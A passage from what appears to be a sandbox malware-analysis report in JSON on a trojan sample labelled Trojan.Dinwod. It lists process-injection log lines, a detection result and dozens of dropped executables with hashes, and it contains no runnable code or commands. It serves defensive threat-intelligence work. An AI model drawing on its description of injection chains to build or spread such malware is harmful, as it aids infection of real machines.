\"82064.exe\" wrote 32 bytes to a remote process \"C:\\886408.exe\" (Handle: 116)\n \"82064.exe\" wrote 52 bytes to a remote process \"C:\\886408.exe\" (Handle: 116)\n \"82064.exe\" wrote 4 bytes to a remote process \"C:\\886408.exe\" (Handle: 116)\n \"886408.exe\" wrote 32 bytes to a remote process \"C:\\42242.exe\" (Handle: 116)\n \"886408.exe\" wrote 52 bytes to a remote process \"C:\\42242.exe\" (Handle: 116)\n \"886408.exe\" wrote 4 bytes to a remote process \"C:\\42242.exe\" (Handle: 116)\n \"42242.exe\" wrote 32 bytes to a remote process \"C:\\848482.exe\" (Handle: 116)\n \"42242.exe\" wrote 52 bytes to a remote process \"C:\\848482.exe\" (Handle: 116)\n \"42242.exe\" wrote 4 bytes to a remote process \"C:\\848482.exe\" (Handle: 116)\n \"848482.exe\" wrote 32 bytes to a remote process \"C:\\06462.exe\" (Handle: 116)\n \"848482.exe\" wrote 52 bytes to a remote process \"C:\\06462.exe\" (Handle: 116)\n \"848482.exe\" wrote 4 bytes to a remote process \"C:\\06462.exe\" (Handle: 116)\n \"06462.exe\" wrote 32 bytes to a remote process \"C:\\2688428.exe\" (Handle: 116)\n \"06462.exe\" wrote 52 bytes to a remote process \"C:\\2688428.exe\" (Handle: 116)\n \"06462.exe\" wrote 4 bytes to a remote process \"C:\\2688428.exe\" (Handle: 116)\n \"2688428.exe\" wrote 32 bytes to a remote process \"C:\\0882288.exe\" (Handle: 68)\n \"2688428.exe\" wrote 52 bytes to a remote process \"C:\\0882288.exe\" (Handle: 68)\n \"2688428.exe\" wrote 4 bytes to a remote process \"C:\\0882288.exe\" (Handle: 68)\n \"0882288.exe\" wrote 32 bytes to a remote process \"C:\\642824.exe\" (Handle: 116)\n \"0882288.exe\" wrote 52 bytes to a remote process \"C:\\642824.exe\" (Handle: 116)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6
https://hybrid-analysis.com/sample/604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6
Hybrid Analysis - Infostealers
{"size": 344016, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6", "sha256": "604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 111, "extracted_files": [{"name": "0004664.exe", "file_path": "C:\\0004664.exe", "file_size": 344028, "sha256": "4ff1fc08920d6900b80b0260bdd1abe4817adc88ec59c01d5b038dbc1be930d7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0004664.exe (PID: 5812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "004422.exe", "file_path": "C:\\004422.exe", "file_size": 344125, "sha256": "9957505aa82e234f76cc554332423aed2791ceaaeeef5f69faaa71d64fc73a5b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rrjxnjh.exe (PID: 5464)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "024648.exe", "file_path": "C:\\024648.exe", "file_size": 344191, "sha256": "1ef9b95f808ed06f580fda8f90f0afd0f818a0f8de7c6168bc9cde0b613b8e8b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "024648.exe (PID: 2764)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "02848.exe", "file_path": "C:\\02848.exe", "file_size": 344460, "sha256": "7571e56780d9626507c98aca96c3a9a3d2810527da723dd59063fa3a3eb8ff1f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "02848.exe (PID: 2976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0484008.exe", "file_path": "C:\\0484008.exe", "file_size": 344723, "sha256": "46cb7e72a05b1d162c4289aad09c69fbe030b360c5d5151f8dae1e2f3d8baa05", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vdphh.exe (PID: 2832)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0660220.exe", "file_path": "C:\\0660220.exe", "file_size": 344416, "sha256": "cb36cbe3600dfc3fbd689008dbdac3580b11316d1f11b19dd292f064b57bfdf3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "482028.exe (PID: 2776)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "06668.exe", "file_path": "C:\\06668.exe", "file_size": 344601, "sha256": "4bce2881e9f61f2f4cb3562139d9525b2600baff56f15fb596cb88ff8e8b662e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "06668.exe (PID: 2756)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "202808.exe", "file_path": "C:\\202808.exe", "file_size": 344494, "sha256": "1f80f357c92488e0e7ac493af33a400119ba0caeacb5d9c500ea73e50fd7df02", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8486482.exe (PID: 3204)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "20640.exe", "file_path": "C:\\20640.exe", "file_size": 344279, "sha256": "e1b4c33fc64861ca52a438167ad28b673e270eabfccf8d5d78da55c09760becd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "brrppv.exe (PID: 3764)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "220404.exe", "file_path": "C:\\220404.exe", "file_size": 344787, "sha256": "f2cf8be31d2afbf07fdd687440169c610a7494220761e9fe4c9e98f4d9c27687", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "44206.exe (PID: 864)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "22260.exe", "file_path": "C:\\22260.exe", "file_size": 344294, "sha256": "bbaa809a985f074133346b0575cd478dffc369c12607ca5c8880444e635c7dee", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22260.exe (PID: 1920)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "22404.exe", "file_path": "C:\\22404.exe", "file_size": 344221, "sha256": "66b8afb4fadcf460ea4a171670f754a36c38b806e64a0e0b1752558b0c96e1c5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22404.exe (PID: 4336)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "22624.exe", "file_path": "C:\\22624.exe", "file_size": 344581, "sha256": "c916a4e36bdcc74c84acffa9b101509e763e0bd1bf7ba8925a8561554d0e0043", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fhjttl.exe (PID: 4172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "26064.exe", "file_path": "C:\\26064.exe", "file_size": 344326, "sha256": "0ce8dd2341ef325f41d273eee18e7ce899c9cc14cba4da015ec01f89d0548218", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "408224.exe (PID: 4160)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2848464.exe", "file_path": "C:\\2848464.exe", "file_size": 344342, "sha256": "6e2376f96616006a4aeb8d7c3d0a87fb63d804d062072c833f60830808b6b7fa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "26064.exe (PID: 3484)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4060800.exe", "file_path": "C:\\4060800.exe", "file_size": 344040, "sha256": "2aadbdbbefb484f63dfd7ccae9a8fae35eb322b8282544f92a627206f8d00f86", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0004664.exe (PID: 5812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "408224.exe", "file_path": "C:\\408224.exe", "file_size": 344313, "sha256": "24a61671edf170fa6637b4585f79ad63a05a99e8d994b3ab5fd28895388e2743", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22260.exe (PID: 1920)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4220002.exe", "file_path": "C:\\4220002.exe", "file_size": 344757, "sha256": "5556fee0bcfe696fece0f52b3a02e96d54481eba3d0319eea9dd272de4673e88", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4220002.exe (PID: 3876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "44206.exe", "file_path": "C:\\44206.exe", "file_size": 344768, "sha256": "9c10bdd1b0c6a69b5747be276f6665fbb127e02d44b65e2412be06460f3ef032", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "44206.exe (PID: 864)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "482028.exe", "file_path": "C:\\482028.exe", "file_size": 344405, "sha256": "103741df1cfb7151e698decece83b24041c00facf8abd74f84fb83ca660a2a08", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "482028.exe (PID: 2776)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "482642.exe", "file_path": "C:\\482642.exe", "file_size": 344051, "sha256": "2ed78f748a267c4703e2ddc3bdf19fb0956f06e33408bf02b75f54ce884df240", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4060800.exe (PID: 6068)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "482820.exe", "file_path": "C:\\482820.exe", "file_size": 344617, "sha256": "73aa41d5a04f41bdeac7ab1d63447042ae12e5f7f01d5db706ac32624a48aac9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "06668.exe (PID: 2756)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4862082.exe", "file_path": "C:\\4862082.exe", "file_size": 344231, "sha256": "b3461e6d5ade7e356693b8c8dc79fc4d07e497ceddb262b7d5d20b08482bbdf9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4862082.exe (PID: 3560)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "640660.exe", "file_path": "C:\\640660.exe", "file_size": 344201, "sha256": "40fd13ef4b4ac0112d80dd3f130c01bacd18df7766bc78ea87b5cbe2f9ac1113", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "024648.exe (PID: 2764)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6466842.exe", "file_path": "C:\\6466842.exe", "file_size": 344433, "sha256": "15b93ca0c97f79299d22713c7656df32902e4a109aec98a29ca0b294c0bbc569", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6466842.exe (PID: 3700)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "664004.exe", "file_path": "C:\\664004.exe", "file_size": 344385, "sha256": "d38a6e86917bcce0bd3fa4101e44fa3fd63d129cd8f7332208007484888bff37", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vdxvjb.exe (PID: 1380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8084222.exe", "file_path": "C:\\8084222.exe", "file_size": 344747, "sha256": "317185ad8383eebf8a9d7ed7034e1e12e6a0a17adf31f79e9d12fe203466aa4c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8084222.exe (PID: 416)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "82080.exe", "file_path": "C:\\82080.exe", "file_size": 344447, "sha256": "a4d5941abe3088997dd072dd49c0467bc81460cf612e8dab22e502d1a0471caf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6466842.exe (PID: 3700)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "840062.exe", "file_path": "C:\\840062.exe", "file_size": 344635, "sha256": "8fd6e012e0c6ed52a453646a29cb1c095ea35cecb3475142f419f561cfece52f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "482820.exe (PID: 3804)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8486482.exe", "file_path": "C:\\8486482.exe", "file_size": 344478, "sha256": "b8a21ad4f3bbe93ab2a1d3f5aee49db6a8c6612570e65340c11e5c38bf828444", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "02848.exe (PID: 2976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "88060.exe", "file_path": "C:\\88060.exe", "file_size": 344736, "sha256": "5e0a6a6c24517e34dafaa5298d2113046ee226b305e605b228f158b720153c0f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0484008.exe (PID: 2836)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bbpbfhd.exe", "file_path": "C:\\bbpbfhd.exe", "file_size": 344079, "sha256": "f55c47486e7a75061296dc1d864c378cf7e9c1fa4ff73366bf83199fabe753a1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lthxxd.exe (PID: 5940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "brrppv.exe", "file_path": "C:\\brrppv.exe", "file_size": 344269, "sha256": "a2eec39af6f7b3d46354c7c1d32eea3544016992437ccb95f26f6580c94b888c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "njdbdxd.exe (PID: 3540)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "btvjnxf.exe", "file_path": "C:\\btvjnxf.exe", "file_size": 344652, "sha256": "f63ff2d63b381ffdd93a2b712b557462f17bb6d8e80342ae8cdfb7032b702498", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "btvjnxf.exe (PID: 272)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dfllnjr.exe", "file_path": "C:\\dfllnjr.exe", "file_size": 344542, "sha256": "c5304e5967f1f829fe0ce9a7b34f148eb1cd0649c34c58d0e05036541ea9ca42", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vnhnhxx.exe (PID: 3680)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dpndv.exe", "file_path": "C:\\dpndv.exe", "file_size": 344856, "sha256": "8a14b8880bc570305d13596fcc4cd0efb3f42fb9c448eb69376884c03fcda24c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rxfxxnn.exe (PID: 1884)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "drbdjh.exe", "file_path": "C:\\drbdjh.exe", "file_size": 344935, "sha256": "d2e17b09f874ba0ab366037059411e9bc9798f9b997995847e90431506a5c576", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lhrhrpt.exe (PID: 3252)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fhjttl.exe", "file_path": "C:\\fhjttl.exe", "file_size": 344567, "sha256": "5af928001878bcd106a83706666fc50367458fddfd9b4ca804936268060082e0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fhjttl.exe (PID: 4172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fjhdxhf.exe", "file_path": "C:\\fjhdxhf.exe", "file_size": 344514, "sha256": "8d4fd8c264f740f57a1eddf9c59715c5523055757b822e984f6205305f87c1b4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fjhdxhf.exe (PID: 3556)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fnrxft.exe", "file_path": "C:\\fnrxft.exe", "file_size": 344869, "sha256": "e49d271a4799355b6f0ea33c119e1d45070d814bcb0a91b82ab40474c7e82cfc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dpndv.exe (PID: 2576)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fnvpbxr.exe", "file_path": "C:\\fnvpbxr.exe", "file_size": 344242, "sha256": "a5dc4c1611dc93b9e768f71b636dd3f19d678803b418fca25b69a990d75f633e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4862082.exe (PID: 3560)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hlrtth.exe", "file_path": "C:\\hlrtth.exe", "file_size": 344557, "sha256": "d76042a3102e6a9e84d8cc9625b7af8ef03f4428ca0e8e69d72fa30fa189d1bd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dfllnjr.exe (PID: 2784)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hntdntx.exe", "file_path": "C:\\hntdntx.exe", "file_size": 344359, "sha256": "b8376ed6c08fca14b4558b6de7fd0b6940fa5a903c96eabdae9d131ee4a9e24e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hntdntx.exe (PID: 3292)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hvjhb.exe", "file_path": "C:\\hvjhb.exe", "file_size": 344163, "sha256": "3dec5ce279b5a59f18f141ecbb58c574dbfd7a1bba23765abc17bd7c2525599b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pnrdltb.exe (PID: 6016)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lhrhrpt.exe", "file_path": "C:\\lhrhrpt.exe", "file_size": 344916, "sha256": "162b8a56d1b14e4c521f551053f127765ae1a1dc24acf5153dab6f1283b2ed6c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rtrnhfh.exe (PID: 3748)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lthxxd.exe", "file_path": "C:\\lthxxd.exe", "file_size": 344066, "sha256": "88e5317d2bbeaa68228d8f93269a4bbbb82941c71167e233f915cefeaa8f4866", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lthxxd.exe (PID: 5940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lxhhl.exe", "file_path": "C:\\lxhhl.exe", "file_size": 344879, "sha256": "47f0c7ed2f2eef574d7934c63ddc100829e498a58185daee7852165ce16c44fd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lxhhl.exe (PID: 4488)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "njdbdxd.exe", "file_path": "C:\\njdbdxd.exe", "file_size": 344259, "sha256": "a3027e3225d3e77b8d67830011e3cf89935e4c60d2a3422fac45088d66ef994e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "njdbdxd.exe (PID: 3540)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nlrvnpx.exe", "file_path": "C:\\nlrvnpx.exe", "file_size": 344683, "sha256": "a9c70c4152d90a67abe8aaaa9c769efa4959eef9e5251bcecc13bc1ea2162944", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nlrvnpx.exe (PID: 328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "npjbvrb.exe", "file_path": "C:\\npjbvrb.exe", "file_size": 344807, "sha256": "c466afb65dd8982f7ffa0faaefbfdab0af072c92e1cbde9e4961df30d88adce4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "npjbvrb.exe (PID: 1620)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ntpbdh.exe", "file_path": "C:\\ntpbdh.exe", "file_size": 344095, "sha256": "b19d31b70c736f2b82918f835ae972a8648f89231d8ba405c163c1abcc3a44c7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ntpbdh.exe (PID: 5756)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pnrdltb.exe", "file_path": "C:\\pnrdltb.exe", "file_size": 344153, "sha256": "7bbbc7e20b155d4413a97a203630f01abfa0cbf4b83c7364a40d1aa2cdcacb1e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pnrdltb.exe (PID: 6016)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rlrbxrl.exe", "file_path": "C:\\rlrbxrl.exe", "file_size": 344143, "sha256": "2222f2c4c6b1d5a664cdea55ccdb97f59f703a70fed60e7cd5e35db098dbe92a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "004422.exe (PID: 6136)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rrjxnjh.exe", "file_path": "C:\\rrjxnjh.exe", "file_size": 344112, "sha256": "3efe0658d60363c65806c9a38e1fec79a31cda6fb6e7c2db973f373ae31c74c0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ntpbdh.exe (PID: 5756)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rtrnhfh.exe", "file_path": "C:\\rtrnhfh.exe", "file_size": 344905, "sha256": "494d4a75122ac8c38d0eb4488544fd33fa5094b20fdee27063a2bc19b6cce3f8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rtrnhfh.exe (PID: 3748)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rxfxxnn.exe", "file_path": "C:\\rxfxxnn.exe", "file_size": 344839, "sha256": "96db3a11809cf0f9989174fcaf0981d1f85f27404b32aa663c7e17d9904a2823", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rxfxxnn.exe (PID: 1884)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vbtfdd.exe", "file_path": "C:\\vbtfdd.exe", "file_size": 344664, "sha256": "15e4c95d5b69e88650e1ba5d72a0fcab24849bf1b0193955e727ace12d7b701f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "btvjnxf.exe (PID: 272)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vdphh.exe", "file_path": "C:\\vdphh.exe", "file_size": 344709, "sha256": "d814bd67653ae99eb8d50030b4ed7f2cd96e3777aae0aae4b884908b8039b09b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vdphh.exe (PID: 2832)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vdxvjb.exe", "file_path": "C:\\vdxvjb.exe", "file_size": 344369, "sha256": "d09fb1ae295202c2b55400ee14af312c87121503f334e30f1d17df1df70904c5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vdxvjb.exe (PID: 1380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vhftp.exe", "file_path": "C:\\vhftp.exe", "file_size": 344894, "sha256": "b1bea93b4ece97c519efd678a21f49321c930e9490b31eb3ae2ce648e66f72a4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lxhhl.exe (PID: 4488)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vnhnhxx.exe", "file_path": "C:\\vnhnhxx.exe", "file_size": 344526, "sha256": "bc0deac0cb35518c600325056d3a04d6f3a5c945b47dec2e6b1b2e853119127b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fjhdxhf.exe (PID: 3556)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xnpjdph.exe", "file_path": "C:\\xnpjdph.exe", "file_size": 344181, "sha256": "0754bc0808d088e1f7d21e5d895ec4e62e16f9d9c78195cfb94030ee6e881a9e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xnpjdph.exe (PID: 4280)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xprhl.exe", "file_path": "C:\\xprhl.exe", "file_size": 344827, "sha256": "bce763b79a83cf16b7793c89f48c40eac152923ae00086c3da47eb7038a9af35", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "npjbvrb.exe (PID: 1620)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xvprxbd.exe", "file_path": "C:\\xvprxbd.exe", "file_size": 344696, "sha256": "817d6ceaf66602c83ef97239c071165dbf8a29af6cf6405493a8f3d7c940316a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nlrvnpx.exe (PID: 328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tfpfbjl.exe", "file_size": 345152, "sha256": "e52917d995a9b33751ab88825841786efa271631f92c2c24b58c72ef416d4f6e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rjvxrf.exe", "file_size": 345134, "sha256": "6320474e360ab3ff8d35126848b48b6220e585614cc510192568b34c207af924", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pttxvt.exe", "file_size": 345115, "sha256": "537e5baf783f5188d82fcd9c19fce4f4ff6acd8eb9202b725f7174977c85c131", 